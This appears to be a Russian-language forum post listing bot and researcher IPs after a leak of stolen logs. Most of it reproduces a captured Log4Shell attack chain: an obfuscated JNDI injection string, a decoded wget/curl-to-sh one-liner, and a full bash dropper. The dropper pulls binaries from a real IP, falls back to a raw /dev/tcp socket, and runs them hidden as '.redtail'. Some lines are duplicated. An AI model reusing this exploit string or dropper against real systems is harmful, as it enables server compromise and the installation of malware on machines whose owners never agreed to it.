IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6
UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')
Decode Stage1:
Код: Скопировать в буфер обмена
Stage2:
Код: Скопировать в буфер обмена
Есть дубли и ipv6
UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')
Decode Stage1:
Код: Скопировать в буфер обмена
Code:
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell
Stage2:
Код: Скопировать в буфер обмена
Code:
#!/bin/bash
dlr() {
wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
if [ $? -ne 0 ]; then
exec 3<>"/dev/tcp/185.172.128.93/80"
echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
(while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
exec 3>&-
fi
}
NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""
for dir in $NOEXEC_DIRS; do
EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done
FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true
for i in $FOLDERS /tmp /var/tmp /dev/shm; do
if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
rm -rf .testfile .testfile2
break
fi
done
dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean
rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
dlr x86_64
mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
dlr i686
mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
dlr aarch64
mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
dlr arm7
mv arm7 .redtail
else
OK=false
for a in x86_64 i686 aarch64 arm7; do
dlr $a
cat $a >.redtail
chmod +x .redtail
./.redtail $1 >/dev/null 2>&1
rm -rf $a
done
fi
if [ $OK = true ]; then
chmod +x .redtail
./.redtail $1 >/dev/null 2>&1
fi